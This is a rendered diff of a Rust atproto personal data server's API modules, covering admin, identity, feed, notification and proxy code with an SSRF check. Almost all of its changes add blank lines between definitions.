State(state): State<AppState>,
20
headers: axum::http::HeaderMap,
···
61
}
62
}
63
}
64
+
65
#[derive(Deserialize)]
66
pub struct UpdateAccountHandleInput {
67
pub did: String,
68
pub handle: String,
69
}
70
+
71
pub async fn update_account_handle(
72
State(state): State<AppState>,
73
headers: axum::http::HeaderMap,
···
143
}
144
}
145
}
146
+
147
#[derive(Deserialize)]
148
pub struct UpdateAccountPasswordInput {
149
pub did: String,
150
pub password: String,
151
}
152
+
153
pub async fn update_account_password(
154
State(state): State<AppState>,
155
headers: axum::http::HeaderMap,
+11
src/api/admin/invite.rs
+11
src/api/admin/invite.rs
···
8
use serde::{Deserialize, Serialize};
9
use serde_json::json;
10
use tracing::error;
11
#[derive(Deserialize)]
12
#[serde(rename_all = "camelCase")]
13
pub struct DisableInviteCodesInput {
14
pub codes: Option<Vec<String>>,
15
pub accounts: Option<Vec<String>>,
16
}
17
pub async fn disable_invite_codes(
18
State(state): State<AppState>,
19
headers: axum::http::HeaderMap,
···
51
}
52
(StatusCode::OK, Json(json!({}))).into_response()
53
}
54
#[derive(Deserialize)]
55
pub struct GetInviteCodesParams {
56
pub sort: Option<String>,
57
pub limit: Option<i64>,
58
pub cursor: Option<String>,
59
}
60
#[derive(Serialize)]
61
#[serde(rename_all = "camelCase")]
62
pub struct InviteCodeInfo {
···
68
pub created_at: String,
69
pub uses: Vec<InviteCodeUseInfo>,
70
}
71
#[derive(Serialize)]
72
#[serde(rename_all = "camelCase")]
73
pub struct InviteCodeUseInfo {
74
pub used_by: String,
75
pub used_at: String,
76
}
77
#[derive(Serialize)]
78
pub struct GetInviteCodesOutput {
79
pub cursor: Option<String>,
80
pub codes: Vec<InviteCodeInfo>,
81
}
82
pub async fn get_invite_codes(
83
State(state): State<AppState>,
84
headers: axum::http::HeaderMap,
···
192
)
193
.into_response()
194
}
195
#[derive(Deserialize)]
196
pub struct DisableAccountInvitesInput {
197
pub account: String,
198
}
199
pub async fn disable_account_invites(
200
State(state): State<AppState>,
201
headers: axum::http::HeaderMap,
···
241
}
242
}
243
}
244
#[derive(Deserialize)]
245
pub struct EnableAccountInvitesInput {
246
pub account: String,
247
}
248
pub async fn enable_account_invites(
249
State(state): State<AppState>,
250
headers: axum::http::HeaderMap,
···
8
use serde::{Deserialize, Serialize};
9
use serde_json::json;
10
use tracing::error;
11
+
12
#[derive(Deserialize)]
13
#[serde(rename_all = "camelCase")]
14
pub struct DisableInviteCodesInput {
15
pub codes: Option<Vec<String>>,
16
pub accounts: Option<Vec<String>>,
17
}
18
+
19
pub async fn disable_invite_codes(
20
State(state): State<AppState>,
21
headers: axum::http::HeaderMap,
···
53
}
54
(StatusCode::OK, Json(json!({}))).into_response()
55
}
56
+
57
#[derive(Deserialize)]
58
pub struct GetInviteCodesParams {
59
pub sort: Option<String>,
60
pub limit: Option<i64>,
61
pub cursor: Option<String>,
62
}
63
+
64
#[derive(Serialize)]
65
#[serde(rename_all = "camelCase")]
66
pub struct InviteCodeInfo {
···
72
pub created_at: String,
73
pub uses: Vec<InviteCodeUseInfo>,
74
}
75
+
76
#[derive(Serialize)]
77
#[serde(rename_all = "camelCase")]
78
pub struct InviteCodeUseInfo {
79
pub used_by: String,
80
pub used_at: String,
81
}
82
+
83
#[derive(Serialize)]
84
pub struct GetInviteCodesOutput {
85
pub cursor: Option<String>,
86
pub codes: Vec<InviteCodeInfo>,
87
}
88
+
89
pub async fn get_invite_codes(
90
State(state): State<AppState>,
91
headers: axum::http::HeaderMap,
···
199
)
200
.into_response()
201
}
202
+
203
#[derive(Deserialize)]
204
pub struct DisableAccountInvitesInput {
205
pub account: String,
206
}
207
+
208
pub async fn disable_account_invites(
209
State(state): State<AppState>,
210
headers: axum::http::HeaderMap,
···
250
}
251
}
252
}
253
+
254
#[derive(Deserialize)]
255
pub struct EnableAccountInvitesInput {
256
pub account: String,
257
}
258
+
259
pub async fn enable_account_invites(
260
State(state): State<AppState>,
261
headers: axum::http::HeaderMap,
+1
src/api/admin/mod.rs
+1
src/api/admin/mod.rs
+7
src/api/admin/status.rs
+7
src/api/admin/status.rs
···
8
use serde::{Deserialize, Serialize};
9
use serde_json::json;
10
use tracing::{error, warn};
11
#[derive(Deserialize)]
12
pub struct GetSubjectStatusParams {
13
pub did: Option<String>,
14
pub uri: Option<String>,
15
pub blob: Option<String>,
16
}
17
#[derive(Serialize)]
18
pub struct SubjectStatus {
19
pub subject: serde_json::Value,
20
pub takedown: Option<StatusAttr>,
21
pub deactivated: Option<StatusAttr>,
22
}
23
#[derive(Serialize)]
24
#[serde(rename_all = "camelCase")]
25
pub struct StatusAttr {
26
pub applied: bool,
27
pub r#ref: Option<String>,
28
}
29
pub async fn get_subject_status(
30
State(state): State<AppState>,
31
headers: axum::http::HeaderMap,
···
184
)
185
.into_response()
186
}
187
#[derive(Deserialize)]
188
#[serde(rename_all = "camelCase")]
189
pub struct UpdateSubjectStatusInput {
···
191
pub takedown: Option<StatusAttrInput>,
192
pub deactivated: Option<StatusAttrInput>,
193
}
194
#[derive(Deserialize)]
195
pub struct StatusAttrInput {
196
pub apply: bool,
197
pub r#ref: Option<String>,
198
}
199
pub async fn update_subject_status(
200
State(state): State<AppState>,
201
headers: axum::http::HeaderMap,
···
8
use serde::{Deserialize, Serialize};
9
use serde_json::json;
10
use tracing::{error, warn};
11
+
12
#[derive(Deserialize)]
13
pub struct GetSubjectStatusParams {
14
pub did: Option<String>,
15
pub uri: Option<String>,
16
pub blob: Option<String>,
17
}
18
+
19
#[derive(Serialize)]
20
pub struct SubjectStatus {
21
pub subject: serde_json::Value,
22
pub takedown: Option<StatusAttr>,
23
pub deactivated: Option<StatusAttr>,
24
}
25
+
26
#[derive(Serialize)]
27
#[serde(rename_all = "camelCase")]
28
pub struct StatusAttr {
29
pub applied: bool,
30
pub r#ref: Option<String>,
31
}
32
+
33
pub async fn get_subject_status(
34
State(state): State<AppState>,
35
headers: axum::http::HeaderMap,
···
188
)
189
.into_response()
190
}
191
+
192
#[derive(Deserialize)]
193
#[serde(rename_all = "camelCase")]
194
pub struct UpdateSubjectStatusInput {
···
196
pub takedown: Option<StatusAttrInput>,
197
pub deactivated: Option<StatusAttrInput>,
198
}
199
+
200
#[derive(Deserialize)]
201
pub struct StatusAttrInput {
202
pub apply: bool,
203
pub r#ref: Option<String>,
204
}
205
+
206
pub async fn update_subject_status(
207
State(state): State<AppState>,
208
headers: axum::http::HeaderMap,
+7
src/api/error.rs
+7
src/api/error.rs
···
4
response::{IntoResponse, Response},
5
};
6
use serde::Serialize;
7
#[derive(Debug, Serialize)]
8
struct ErrorBody {
9
error: &'static str,
10
#[serde(skip_serializing_if = "Option::is_none")]
11
message: Option<String>,
12
}
13
#[derive(Debug)]
14
pub enum ApiError {
15
InternalError,
···
46
UpstreamUnavailable(String),
47
UpstreamError { status: u16, error: Option<String>, message: Option<String> },
48
}
49
impl ApiError {
50
fn status_code(&self) -> StatusCode {
51
match self {
···
144
Self::UpstreamError { status, error: None, message: None }
145
}
146
}
147
impl IntoResponse for ApiError {
148
fn into_response(self) -> Response {
149
let body = ErrorBody {
···
153
(self.status_code(), Json(body)).into_response()
154
}
155
}
156
impl From<sqlx::Error> for ApiError {
157
fn from(e: sqlx::Error) -> Self {
158
tracing::error!("Database error: {:?}", e);
159
Self::DatabaseError
160
}
161
}
162
impl From<crate::auth::TokenValidationError> for ApiError {
163
fn from(e: crate::auth::TokenValidationError) -> Self {
164
match e {
···
169
}
170
}
171
}
172
impl From<crate::util::DbLookupError> for ApiError {
173
fn from(e: crate::util::DbLookupError) -> Self {
174
match e {
···
4
response::{IntoResponse, Response},
5
};
6
use serde::Serialize;
7
+
8
#[derive(Debug, Serialize)]
9
struct ErrorBody {
10
error: &'static str,
11
#[serde(skip_serializing_if = "Option::is_none")]
12
message: Option<String>,
13
}
14
+
15
#[derive(Debug)]
16
pub enum ApiError {
17
InternalError,
···
48
UpstreamUnavailable(String),
49
UpstreamError { status: u16, error: Option<String>, message: Option<String> },
50
}
51
+
52
impl ApiError {
53
fn status_code(&self) -> StatusCode {
54
match self {
···
147
Self::UpstreamError { status, error: None, message: None }
148
}
149
}
150
+
151
impl IntoResponse for ApiError {
152
fn into_response(self) -> Response {
153
let body = ErrorBody {
···
157
(self.status_code(), Json(body)).into_response()
158
}
159
}
160
+
161
impl From<sqlx::Error> for ApiError {
162
fn from(e: sqlx::Error) -> Self {
163
tracing::error!("Database error: {:?}", e);
164
Self::DatabaseError
165
}
166
}
167
+
168
impl From<crate::auth::TokenValidationError> for ApiError {
169
fn from(e: crate::auth::TokenValidationError) -> Self {
170
match e {
···
175
}
176
}
177
}
178
+
179
impl From<crate::util::DbLookupError> for ApiError {
180
fn from(e: crate::util::DbLookupError) -> Self {
181
match e {
+3
src/api/feed/actor_likes.rs
+3
src/api/feed/actor_likes.rs
···
13
use serde_json::Value;
14
use std::collections::HashMap;
15
use tracing::warn;
16
#[derive(Deserialize)]
17
pub struct GetActorLikesParams {
18
pub actor: String,
19
pub limit: Option<u32>,
20
pub cursor: Option<String>,
21
}
22
fn insert_likes_into_feed(feed: &mut Vec<FeedViewPost>, likes: &[RecordDescript<LikeRecord>]) {
23
for like in likes {
24
let like_time = &like.indexed_at.to_rfc3339();
···
57
);
58
}
59
}
60
pub async fn get_actor_likes(
61
State(state): State<AppState>,
62
headers: axum::http::HeaderMap,
···
13
use serde_json::Value;
14
use std::collections::HashMap;
15
use tracing::warn;
16
+
17
#[derive(Deserialize)]
18
pub struct GetActorLikesParams {
19
pub actor: String,
20
pub limit: Option<u32>,
21
pub cursor: Option<String>,
22
}
23
+
24
fn insert_likes_into_feed(feed: &mut Vec<FeedViewPost>, likes: &[RecordDescript<LikeRecord>]) {
25
for like in likes {
26
let like_time = &like.indexed_at.to_rfc3339();
···
59
);
60
}
61
}
62
+
63
pub async fn get_actor_likes(
64
State(state): State<AppState>,
65
headers: axum::http::HeaderMap,
+2
src/api/feed/custom_feed.rs
+2
src/api/feed/custom_feed.rs
···
11
use serde::Deserialize;
12
use std::collections::HashMap;
13
use tracing::{error, info};
14
#[derive(Deserialize)]
15
pub struct GetFeedParams {
16
pub feed: String,
17
pub limit: Option<u32>,
18
pub cursor: Option<String>,
19
}
20
pub async fn get_feed(
21
State(state): State<AppState>,
22
headers: axum::http::HeaderMap,
···
11
use serde::Deserialize;
12
use std::collections::HashMap;
13
use tracing::{error, info};
14
+
15
#[derive(Deserialize)]
16
pub struct GetFeedParams {
17
pub feed: String,
18
pub limit: Option<u32>,
19
pub cursor: Option<String>,
20
}
21
+
22
pub async fn get_feed(
23
State(state): State<AppState>,
24
headers: axum::http::HeaderMap,
+1
src/api/feed/mod.rs
+1
src/api/feed/mod.rs
+10
src/api/feed/post_thread.rs
+10
src/api/feed/post_thread.rs
···
13
use serde_json::{json, Value};
14
use std::collections::HashMap;
15
use tracing::warn;
16
#[derive(Deserialize)]
17
pub struct GetPostThreadParams {
18
pub uri: String,
···
20
#[serde(rename = "parentHeight")]
21
pub parent_height: Option<u32>,
22
}
23
#[derive(Debug, Clone, Serialize, Deserialize)]
24
#[serde(rename_all = "camelCase")]
25
pub struct ThreadViewPost {
···
33
#[serde(flatten)]
34
pub extra: HashMap<String, Value>,
35
}
36
#[derive(Debug, Clone, Serialize, Deserialize)]
37
#[serde(untagged)]
38
pub enum ThreadNode {
···
40
NotFound(ThreadNotFound),
41
Blocked(ThreadBlocked),
42
}
43
#[derive(Debug, Clone, Serialize, Deserialize)]
44
#[serde(rename_all = "camelCase")]
45
pub struct ThreadNotFound {
···
48
pub uri: String,
49
pub not_found: bool,
50
}
51
#[derive(Debug, Clone, Serialize, Deserialize)]
52
#[serde(rename_all = "camelCase")]
53
pub struct ThreadBlocked {
···
57
pub blocked: bool,
58
pub author: Value,
59
}
60
#[derive(Debug, Clone, Serialize, Deserialize)]
61
pub struct PostThreadOutput {
62
pub thread: ThreadNode,
63
#[serde(skip_serializing_if = "Option::is_none")]
64
pub threadgate: Option<Value>,
65
}
66
const MAX_THREAD_DEPTH: usize = 10;
67
fn add_replies_to_thread(
68
thread: &mut ThreadViewPost,
69
local_posts: &[RecordDescript<PostRecord>],
···
111
}
112
}
113
}
114
pub async fn get_post_thread(
115
State(state): State<AppState>,
116
headers: axum::http::HeaderMap,
···
190
let lag = get_local_lag(&local_records);
191
format_munged_response(thread_output, lag)
192
}
193
async fn handle_not_found(
194
state: &AppState,
195
uri: &str,
···
13
use serde_json::{json, Value};
14
use std::collections::HashMap;
15
use tracing::warn;
16
+
17
#[derive(Deserialize)]
18
pub struct GetPostThreadParams {
19
pub uri: String,
···
21
#[serde(rename = "parentHeight")]
22
pub parent_height: Option<u32>,
23
}
24
+
25
#[derive(Debug, Clone, Serialize, Deserialize)]
26
#[serde(rename_all = "camelCase")]
27
pub struct ThreadViewPost {
···
35
#[serde(flatten)]
36
pub extra: HashMap<String, Value>,
37
}
38
+
39
#[derive(Debug, Clone, Serialize, Deserialize)]
40
#[serde(untagged)]
41
pub enum ThreadNode {
···
43
NotFound(ThreadNotFound),
44
Blocked(ThreadBlocked),
45
}
46
+
47
#[derive(Debug, Clone, Serialize, Deserialize)]
48
#[serde(rename_all = "camelCase")]
49
pub struct ThreadNotFound {
···
52
pub uri: String,
53
pub not_found: bool,
54
}
55
+
56
#[derive(Debug, Clone, Serialize, Deserialize)]
57
#[serde(rename_all = "camelCase")]
58
pub struct ThreadBlocked {
···
62
pub blocked: bool,
63
pub author: Value,
64
}
65
+
66
#[derive(Debug, Clone, Serialize, Deserialize)]
67
pub struct PostThreadOutput {
68
pub thread: ThreadNode,
69
#[serde(skip_serializing_if = "Option::is_none")]
70
pub threadgate: Option<Value>,
71
}
72
+
73
const MAX_THREAD_DEPTH: usize = 10;
74
+
75
fn add_replies_to_thread(
76
thread: &mut ThreadViewPost,
77
local_posts: &[RecordDescript<PostRecord>],
···
119
}
120
}
121
}
122
+
123
pub async fn get_post_thread(
124
State(state): State<AppState>,
125
headers: axum::http::HeaderMap,
···
199
let lag = get_local_lag(&local_records);
200
format_munged_response(thread_output, lag)
201
}
202
+
203
async fn handle_not_found(
204
state: &AppState,
205
uri: &str,
+4
src/api/feed/timeline.rs
+4
src/api/feed/timeline.rs
···
15
use serde_json::{json, Value};
16
use std::collections::HashMap;
17
use tracing::warn;
18
#[derive(Deserialize)]
19
pub struct GetTimelineParams {
20
pub algorithm: Option<String>,
21
pub limit: Option<u32>,
22
pub cursor: Option<String>,
23
}
24
pub async fn get_timeline(
25
State(state): State<AppState>,
26
headers: axum::http::HeaderMap,
···
56
}
57
get_timeline_local_only(&state, &auth_user.did).await
58
}
59
async fn get_timeline_with_appview(
60
state: &AppState,
61
headers: &axum::http::HeaderMap,
···
123
let lag = get_local_lag(&local_records);
124
format_munged_response(feed_output, lag)
125
}
126
async fn get_timeline_local_only(state: &AppState, auth_did: &str) -> Response {
127
let user_id: uuid::Uuid = match sqlx::query_scalar!(
128
"SELECT id FROM users WHERE did = $1",
···
15
use serde_json::{json, Value};
16
use std::collections::HashMap;
17
use tracing::warn;
18
+
19
#[derive(Deserialize)]
20
pub struct GetTimelineParams {
21
pub algorithm: Option<String>,
22
pub limit: Option<u32>,
23
pub cursor: Option<String>,
24
}
25
+
26
pub async fn get_timeline(
27
State(state): State<AppState>,
28
headers: axum::http::HeaderMap,
···
58
}
59
get_timeline_local_only(&state, &auth_user.did).await
60
}
61
+
62
async fn get_timeline_with_appview(
63
state: &AppState,
64
headers: &axum::http::HeaderMap,
···
126
let lag = get_local_lag(&local_records);
127
format_munged_response(feed_output, lag)
128
}
129
+
130
async fn get_timeline_local_only(state: &AppState, auth_did: &str) -> Response {
131
let user_id: uuid::Uuid = match sqlx::query_scalar!(
132
"SELECT id FROM users WHERE did = $1",
+4
src/api/identity/account.rs
+4
src/api/identity/account.rs
···
16
use serde_json::json;
17
use std::sync::Arc;
18
use tracing::{error, info, warn};
19
fn extract_client_ip(headers: &HeaderMap) -> String {
20
if let Some(forwarded) = headers.get("x-forwarded-for") {
21
if let Ok(value) = forwarded.to_str() {
···
31
}
32
"unknown".to_string()
33
}
34
#[derive(Deserialize)]
35
#[serde(rename_all = "camelCase")]
36
pub struct CreateAccountInput {
···
45
pub telegram_username: Option<String>,
46
pub signal_number: Option<String>,
47
}
48
#[derive(Serialize)]
49
#[serde(rename_all = "camelCase")]
50
pub struct CreateAccountOutput {
···
53
pub verification_required: bool,
54
pub verification_channel: String,
55
}
56
pub async fn create_account(
57
State(state): State<AppState>,
58
headers: HeaderMap,
···
16
use serde_json::json;
17
use std::sync::Arc;
18
use tracing::{error, info, warn};
19
+
20
fn extract_client_ip(headers: &HeaderMap) -> String {
21
if let Some(forwarded) = headers.get("x-forwarded-for") {
22
if let Ok(value) = forwarded.to_str() {
···
32
}
33
"unknown".to_string()
34
}
35
+
36
#[derive(Deserialize)]
37
#[serde(rename_all = "camelCase")]
38
pub struct CreateAccountInput {
···
47
pub telegram_username: Option<String>,
48
pub signal_number: Option<String>,
49
}
50
+
51
#[derive(Serialize)]
52
#[serde(rename_all = "camelCase")]
53
pub struct CreateAccountOutput {
···
56
pub verification_required: bool,
57
pub verification_channel: String,
58
}
59
+
60
pub async fn create_account(
61
State(state): State<AppState>,
62
headers: HeaderMap,
+14
src/api/identity/did.rs
+14
src/api/identity/did.rs
···
13
use serde::Deserialize;
14
use serde_json::json;
15
use tracing::{error, warn};
16
#[derive(Deserialize)]
17
pub struct ResolveHandleParams {
18
pub handle: String,
19
}
20
pub async fn resolve_handle(
21
State(state): State<AppState>,
22
Query(params): Query<ResolveHandleParams>,
···
63
}
64
}
65
}
66
pub fn get_jwk(key_bytes: &[u8]) -> Result<serde_json::Value, &'static str> {
67
let secret_key = SecretKey::from_slice(key_bytes).map_err(|_| "Invalid key length")?;
68
let public_key = secret_key.public_key();
···
78
"y": y_b64
79
}))
80
}
81
pub async fn well_known_did(State(_state): State<AppState>) -> impl IntoResponse {
82
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
83
// Kinda for local dev, encode hostname if it contains port
···
96
}]
97
}))
98
}
99
pub async fn user_did_doc(State(state): State<AppState>, Path(handle): Path<String>) -> Response {
100
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
101
let user = sqlx::query!("SELECT id, did FROM users WHERE handle = $1", handle)
···
174
}]
175
})).into_response()
176
}
177
pub async fn verify_did_web(did: &str, hostname: &str, handle: &str) -> Result<(), String> {
178
let expected_prefix = if hostname.contains(':') {
179
format!("did:web:{}", hostname.replace(':', "%3A"))
···
242
}
243
}
244
}
245
#[derive(serde::Serialize)]
246
#[serde(rename_all = "camelCase")]
247
pub struct GetRecommendedDidCredentialsOutput {
···
250
pub verification_methods: VerificationMethods,
251
pub services: Services,
252
}
253
#[derive(serde::Serialize)]
254
#[serde(rename_all = "camelCase")]
255
pub struct VerificationMethods {
256
pub atproto: String,
257
}
258
#[derive(serde::Serialize)]
259
#[serde(rename_all = "camelCase")]
260
pub struct Services {
261
pub atproto_pds: AtprotoPds,
262
}
263
#[derive(serde::Serialize)]
264
#[serde(rename_all = "camelCase")]
265
pub struct AtprotoPds {
···
267
pub service_type: String,
268
pub endpoint: String,
269
}
270
pub async fn get_recommended_did_credentials(
271
State(state): State<AppState>,
272
headers: axum::http::HeaderMap,
···
329
)
330
.into_response()
331
}
332
#[derive(Deserialize)]
333
pub struct UpdateHandleInput {
334
pub handle: String,
335
}
336
pub async fn update_handle(
337
State(state): State<AppState>,
338
headers: axum::http::HeaderMap,
···
410
}
411
}
412
}
413
pub async fn well_known_atproto_did(
414
State(state): State<AppState>,
415
headers: HeaderMap,
···
13
use serde::Deserialize;
14
use serde_json::json;
15
use tracing::{error, warn};
16
+
17
#[derive(Deserialize)]
18
pub struct ResolveHandleParams {
19
pub handle: String,
20
}
21
+
22
pub async fn resolve_handle(
23
State(state): State<AppState>,
24
Query(params): Query<ResolveHandleParams>,
···
65
}
66
}
67
}
68
+
69
pub fn get_jwk(key_bytes: &[u8]) -> Result<serde_json::Value, &'static str> {
70
let secret_key = SecretKey::from_slice(key_bytes).map_err(|_| "Invalid key length")?;
71
let public_key = secret_key.public_key();
···
81
"y": y_b64
82
}))
83
}
84
+
85
pub async fn well_known_did(State(_state): State<AppState>) -> impl IntoResponse {
86
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
87
// Kinda for local dev, encode hostname if it contains port
···
100
}]
101
}))
102
}
103
+
104
pub async fn user_did_doc(State(state): State<AppState>, Path(handle): Path<String>) -> Response {
105
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
106
let user = sqlx::query!("SELECT id, did FROM users WHERE handle = $1", handle)
···
179
}]
180
})).into_response()
181
}
182
+
183
pub async fn verify_did_web(did: &str, hostname: &str, handle: &str) -> Result<(), String> {
184
let expected_prefix = if hostname.contains(':') {
185
format!("did:web:{}", hostname.replace(':', "%3A"))
···
248
}
249
}
250
}
251
+
252
#[derive(serde::Serialize)]
253
#[serde(rename_all = "camelCase")]
254
pub struct GetRecommendedDidCredentialsOutput {
···
257
pub verification_methods: VerificationMethods,
258
pub services: Services,
259
}
260
+
261
#[derive(serde::Serialize)]
262
#[serde(rename_all = "camelCase")]
263
pub struct VerificationMethods {
264
pub atproto: String,
265
}
266
+
267
#[derive(serde::Serialize)]
268
#[serde(rename_all = "camelCase")]
269
pub struct Services {
270
pub atproto_pds: AtprotoPds,
271
}
272
+
273
#[derive(serde::Serialize)]
274
#[serde(rename_all = "camelCase")]
275
pub struct AtprotoPds {
···
277
pub service_type: String,
278
pub endpoint: String,
279
}
280
+
281
pub async fn get_recommended_did_credentials(
282
State(state): State<AppState>,
283
headers: axum::http::HeaderMap,
···
340
)
341
.into_response()
342
}
343
+
344
#[derive(Deserialize)]
345
pub struct UpdateHandleInput {
346
pub handle: String,
347
}
348
+
349
pub async fn update_handle(
350
State(state): State<AppState>,
351
headers: axum::http::HeaderMap,
···
423
}
424
}
425
}
426
+
427
pub async fn well_known_atproto_did(
428
State(state): State<AppState>,
429
headers: HeaderMap,
+1
src/api/identity/mod.rs
+1
src/api/identity/mod.rs
+1
src/api/identity/plc/mod.rs
+1
src/api/identity/plc/mod.rs
+2
src/api/identity/plc/request.rs
+2
src/api/identity/plc/request.rs
···
9
use chrono::{Duration, Utc};
10
use serde_json::json;
11
use tracing::{error, info, warn};
12
+
13
fn generate_plc_token() -> String {
14
crate::util::generate_token_code()
15
}
16
+
17
pub async fn request_plc_operation_signature(
18
State(state): State<AppState>,
19
headers: axum::http::HeaderMap,
+4
src/api/identity/plc/sign.rs
+4
src/api/identity/plc/sign.rs
···
16
use serde_json::{json, Value};
17
use std::collections::HashMap;
18
use tracing::{error, info, warn};
19
#[derive(Debug, Deserialize)]
20
#[serde(rename_all = "camelCase")]
21
pub struct SignPlcOperationInput {
···
25
pub verification_methods: Option<HashMap<String, String>>,
26
pub services: Option<HashMap<String, ServiceInput>>,
27
}
28
#[derive(Debug, Deserialize, Clone)]
29
pub struct ServiceInput {
30
#[serde(rename = "type")]
31
pub service_type: String,
32
pub endpoint: String,
33
}
34
#[derive(Debug, Serialize)]
35
pub struct SignPlcOperationOutput {
36
pub operation: Value,
37
}
38
pub async fn sign_plc_operation(
39
State(state): State<AppState>,
40
headers: axum::http::HeaderMap,
···
16
use serde_json::{json, Value};
17
use std::collections::HashMap;
18
use tracing::{error, info, warn};
19
+
20
#[derive(Debug, Deserialize)]
21
#[serde(rename_all = "camelCase")]
22
pub struct SignPlcOperationInput {
···
26
pub verification_methods: Option<HashMap<String, String>>,
27
pub services: Option<HashMap<String, ServiceInput>>,
28
}
29
+
30
#[derive(Debug, Deserialize, Clone)]
31
pub struct ServiceInput {
32
#[serde(rename = "type")]
33
pub service_type: String,
34
pub endpoint: String,
35
}
36
+
37
#[derive(Debug, Serialize)]
38
pub struct SignPlcOperationOutput {
39
pub operation: Value,
40
}
41
+
42
pub async fn sign_plc_operation(
43
State(state): State<AppState>,
44
headers: axum::http::HeaderMap,
+2
src/api/identity/plc/submit.rs
+2
src/api/identity/plc/submit.rs
···
12
use serde::Deserialize;
13
use serde_json::{json, Value};
14
use tracing::{error, info, warn};
15
#[derive(Debug, Deserialize)]
16
pub struct SubmitPlcOperationInput {
17
pub operation: Value,
18
}
19
pub async fn submit_plc_operation(
20
State(state): State<AppState>,
21
headers: axum::http::HeaderMap,
···
12
use serde::Deserialize;
13
use serde_json::{json, Value};
14
use tracing::{error, info, warn};
15
+
16
#[derive(Debug, Deserialize)]
17
pub struct SubmitPlcOperationInput {
18
pub operation: Value,
19
}
20
+
21
pub async fn submit_plc_operation(
22
State(state): State<AppState>,
23
headers: axum::http::HeaderMap,
+1
src/api/mod.rs
+1
src/api/mod.rs
+3
src/api/moderation/mod.rs
+3
src/api/moderation/mod.rs
···
9
use serde::{Deserialize, Serialize};
10
use serde_json::{Value, json};
11
use tracing::error;
12
#[derive(Deserialize)]
13
#[serde(rename_all = "camelCase")]
14
pub struct CreateReportInput {
···
16
pub reason: Option<String>,
17
pub subject: Value,
18
}
19
#[derive(Serialize)]
20
#[serde(rename_all = "camelCase")]
21
pub struct CreateReportOutput {
···
26
pub reported_by: String,
27
pub created_at: String,
28
}
29
pub async fn create_report(
30
State(state): State<AppState>,
31
headers: axum::http::HeaderMap,
···
9
use serde::{Deserialize, Serialize};
10
use serde_json::{Value, json};
11
use tracing::error;
12
+
13
#[derive(Deserialize)]
14
#[serde(rename_all = "camelCase")]
15
pub struct CreateReportInput {
···
17
pub reason: Option<String>,
18
pub subject: Value,
19
}
20
+
21
#[derive(Serialize)]
22
#[serde(rename_all = "camelCase")]
23
pub struct CreateReportOutput {
···
28
pub reported_by: String,
29
pub created_at: String,
30
}
31
+
32
pub async fn create_report(
33
State(state): State<AppState>,
34
headers: axum::http::HeaderMap,
+1
src/api/notification/mod.rs
+1
src/api/notification/mod.rs
+3
src/api/notification/register_push.rs
+3
src/api/notification/register_push.rs
···
10
use serde::Deserialize;
11
use serde_json::json;
12
use tracing::{error, info};
13
#[derive(Deserialize)]
14
#[serde(rename_all = "camelCase")]
15
pub struct RegisterPushInput {
···
18
pub platform: String,
19
pub app_id: String,
20
}
21
const VALID_PLATFORMS: &[&str] = &["ios", "android", "web"];
22
pub async fn register_push(
23
State(state): State<AppState>,
24
headers: HeaderMap,
···
10
use serde::Deserialize;
11
use serde_json::json;
12
use tracing::{error, info};
13
+
14
#[derive(Deserialize)]
15
#[serde(rename_all = "camelCase")]
16
pub struct RegisterPushInput {
···
19
pub platform: String,
20
pub app_id: String,
21
}
22
+
23
const VALID_PLATFORMS: &[&str] = &["ios", "android", "web"];
24
+
25
pub async fn register_push(
26
State(state): State<AppState>,
27
headers: HeaderMap,
+4
src/api/notification_prefs.rs
+4
src/api/notification_prefs.rs
···
10
use tracing::info;
11
use crate::auth::validate_bearer_token;
12
use crate::state::AppState;
13
#[derive(Serialize)]
14
#[serde(rename_all = "camelCase")]
15
pub struct NotificationPrefsResponse {
···
22
pub signal_number: Option<String>,
23
pub signal_verified: bool,
24
}
25
pub async fn get_notification_prefs(
26
State(state): State<AppState>,
27
headers: HeaderMap,
···
96
})
97
.into_response()
98
}
99
#[derive(Deserialize)]
100
#[serde(rename_all = "camelCase")]
101
pub struct UpdateNotificationPrefsInput {
···
104
pub telegram_username: Option<String>,
105
pub signal_number: Option<String>,
106
}
107
pub async fn update_notification_prefs(
108
State(state): State<AppState>,
109
headers: HeaderMap,
···
10
use tracing::info;
11
use crate::auth::validate_bearer_token;
12
use crate::state::AppState;
13
+
14
#[derive(Serialize)]
15
#[serde(rename_all = "camelCase")]
16
pub struct NotificationPrefsResponse {
···
23
pub signal_number: Option<String>,
24
pub signal_verified: bool,
25
}
26
+
27
pub async fn get_notification_prefs(
28
State(state): State<AppState>,
29
headers: HeaderMap,
···
98
})
99
.into_response()
100
}
101
+
102
#[derive(Deserialize)]
103
#[serde(rename_all = "camelCase")]
104
pub struct UpdateNotificationPrefsInput {
···
107
pub telegram_username: Option<String>,
108
pub signal_number: Option<String>,
109
}
110
+
111
pub async fn update_notification_prefs(
112
State(state): State<AppState>,
113
headers: HeaderMap,
+1
src/api/proxy.rs
+1
src/api/proxy.rs
+15
src/api/proxy_client.rs
+15
src/api/proxy_client.rs
···
3
use std::sync::OnceLock;
4
use std::time::Duration;
5
use tracing::warn;
6
pub const DEFAULT_HEADERS_TIMEOUT: Duration = Duration::from_secs(10);
7
pub const DEFAULT_BODY_TIMEOUT: Duration = Duration::from_secs(30);
8
pub const DEFAULT_CONNECT_TIMEOUT: Duration = Duration::from_secs(5);
9
pub const MAX_RESPONSE_SIZE: u64 = 10 * 1024 * 1024;
10
static PROXY_CLIENT: OnceLock<Client> = OnceLock::new();
11
pub fn proxy_client() -> &'static Client {
12
PROXY_CLIENT.get_or_init(|| {
13
ClientBuilder::new()
···
20
.expect("Failed to build HTTP client - this indicates a TLS or system configuration issue")
21
})
22
}
23
pub fn is_ssrf_safe(url: &str) -> Result<(), SsrfError> {
24
let parsed = Url::parse(url).map_err(|_| SsrfError::InvalidUrl)?;
25
let scheme = parsed.scheme();
···
61
}
62
Ok(())
63
}
64
fn is_unicast_ip(ip: &IpAddr) -> bool {
65
match ip {
66
IpAddr::V4(v4) => {
···
74
IpAddr::V6(v6) => !v6.is_loopback() && !v6.is_multicast() && !v6.is_unspecified(),
75
}
76
}
77
fn is_private_v4(ip: &std::net::Ipv4Addr) -> bool {
78
let octets = ip.octets();
79
octets[0] == 10
···
81
|| (octets[0] == 192 && octets[1] == 168)
82
|| (octets[0] == 169 && octets[1] == 254)
83
}
84
